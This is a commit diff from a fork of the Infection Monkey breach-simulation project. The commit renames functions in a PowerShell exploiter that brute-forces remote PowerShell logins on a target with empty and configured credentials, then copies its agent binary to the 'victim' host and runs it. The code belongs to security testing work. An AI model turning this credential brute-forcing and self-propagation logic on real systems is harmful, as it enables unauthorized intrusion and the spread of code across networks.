forked from p15670423/monkey
Agent: Refactored PowerShellExploiter authentication function names
This commit is contained in:
Mike Salvatore
parent
e339932fde
commit
f1c247ad93
|
|
@ -41,76 +41,61 @@ class PowerShellExploiter(HostExploiter):
|
|||
logging.getLogger(package.__name__).setLevel(logging.ERROR)
|
||||
|
||||
def _exploit_host(self):
|
||||
result = self._attempt_exploitations()
|
||||
if not result:
|
||||
self.client = self._authenticate_via_brute_force()
|
||||
if not self.client:
|
||||
return False
|
||||
|
||||
arch = self._get_host_arch()
|
||||
self.is_32bit = arch == WIN_ARCH_32
|
||||
self._execute_monkey_agent_on_victim()
|
||||
|
||||
self._write_virtual_file_to_local_path()
|
||||
|
||||
self.monkey_path_on_victim = (
|
||||
self._config.dropper_target_path_win_32
|
||||
if self.is_32bit
|
||||
else self._config.dropper_target_path_win_64
|
||||
)
|
||||
is_monkey_copy_successful = self._copy_monkey_binary_on_victim()
|
||||
|
||||
if is_monkey_copy_successful:
|
||||
self._execute_monkey_on_victim()
|
||||
else:
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
def _attempt_exploitations(self) -> bool:
|
||||
def _authenticate_via_brute_force(self) -> typing.Optional[Client]:
|
||||
try:
|
||||
self.client = self._exploit_without_credentials()
|
||||
client = self._authenticate_with_empty_credentials()
|
||||
return client
|
||||
except FailedExploitationError:
|
||||
LOG.info("Failed exploitation without credentials.")
|
||||
try:
|
||||
self.client = self._exploit_with_usernames_only(
|
||||
usernames=self._config.exploit_user_list
|
||||
)
|
||||
except FailedExploitationError:
|
||||
LOG.info("Failed exploitation using configured usernames only.")
|
||||
try:
|
||||
self.client = self._exploit_with_credentials(
|
||||
credential_list=self._config.get_exploit_user_password_pairs()
|
||||
)
|
||||
except FailedExploitationError:
|
||||
LOG.info("Failed exploitation using configured credentials. Quitting.")
|
||||
return False
|
||||
|
||||
return True
|
||||
try:
|
||||
client = self._authenticate_with_empty_passwords(
|
||||
usernames=self._config.exploit_user_list
|
||||
)
|
||||
return client
|
||||
except FailedExploitationError:
|
||||
LOG.info("Failed exploitation using configured usernames only.")
|
||||
|
||||
def _exploit_without_credentials(self) -> Client:
|
||||
return self._try_exploit()
|
||||
try:
|
||||
client = self._authenticate_with_usernames_and_passwords(
|
||||
credential_list=self._config.get_exploit_user_password_pairs()
|
||||
)
|
||||
return client
|
||||
except FailedExploitationError:
|
||||
LOG.info("Failed exploitation using configured credentials. Quitting.")
|
||||
|
||||
def _exploit_with_usernames_only(self, usernames: typing.List[str]) -> Client:
|
||||
return None
|
||||
|
||||
def _authenticate_with_empty_credentials(self) -> Client:
|
||||
return self._authenticate(None, None)
|
||||
|
||||
def _authenticate_with_empty_passwords(self, usernames: typing.List[str]) -> Client:
|
||||
for username in usernames:
|
||||
try:
|
||||
client = self._try_exploit(username)
|
||||
client = self._authenticate(username, None)
|
||||
return client
|
||||
except FailedExploitationError:
|
||||
pass
|
||||
raise FailedExploitationError
|
||||
|
||||
def _exploit_with_credentials(
|
||||
def _authenticate_with_usernames_and_passwords(
|
||||
self, credential_list: typing.List[typing.Tuple[str, str]]
|
||||
) -> Client:
|
||||
for username, password in credential_list:
|
||||
try:
|
||||
client = self._try_exploit(username, password)
|
||||
client = self._authenticate(username, password)
|
||||
return client
|
||||
except FailedExploitationError:
|
||||
pass
|
||||
raise FailedExploitationError
|
||||
|
||||
def _try_exploit(
|
||||
self, username: typing.Optional[str] = None, password: typing.Optional[str] = None
|
||||
) -> Client:
|
||||
def _authenticate(self, username: str, password: str) -> Client:
|
||||
try:
|
||||
with Client(
|
||||
self.host.ip_addr,
|
||||
|
|
@ -124,6 +109,26 @@ class PowerShellExploiter(HostExploiter):
|
|||
except Exception:
|
||||
raise FailedExploitationError
|
||||
|
||||
def _execute_monkey_agent_on_victim(self):
|
||||
arch = self._get_host_arch()
|
||||
self.is_32bit = arch == WIN_ARCH_32
|
||||
|
||||
self._write_virtual_file_to_local_path()
|
||||
|
||||
self.monkey_path_on_victim = (
|
||||
self._config.dropper_target_path_win_32
|
||||
if self.is_32bit
|
||||
else self._config.dropper_target_path_win_64
|
||||
)
|
||||
is_monkey_copy_successful = self._copy_monkey_binary_to_victim()
|
||||
|
||||
if is_monkey_copy_successful:
|
||||
self._run_monkey_executable_on_victim()
|
||||
else:
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
def _get_host_arch(self) -> typing.Union[WIN_ARCH_32, WIN_ARCH_64]:
|
||||
output = self._execute_cmd_on_host(GET_ARCH_WINDOWS)
|
||||
if "64-bit" in output:
|
||||
|
|
@ -142,7 +147,7 @@ class PowerShellExploiter(HostExploiter):
|
|||
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
|
||||
monkey_local_file.write(monkey_virtual_file.read())
|
||||
|
||||
def _copy_monkey_binary_on_victim(self) -> bool:
|
||||
def _copy_monkey_binary_to_victim(self) -> bool:
|
||||
try:
|
||||
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim)
|
||||
return True
|
||||
|
|
@ -151,7 +156,7 @@ class PowerShellExploiter(HostExploiter):
|
|||
finally:
|
||||
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
|
||||
|
||||
def _execute_monkey_on_victim(self) -> None:
|
||||
def _run_monkey_executable_on_victim(self) -> None:
|
||||
monkey_params = build_monkey_commandline(
|
||||
target_host=self.host,
|
||||
depth=get_monkey_depth() - 1,
|
||||
|
|
|
|||
Loading…
Reference in New Issue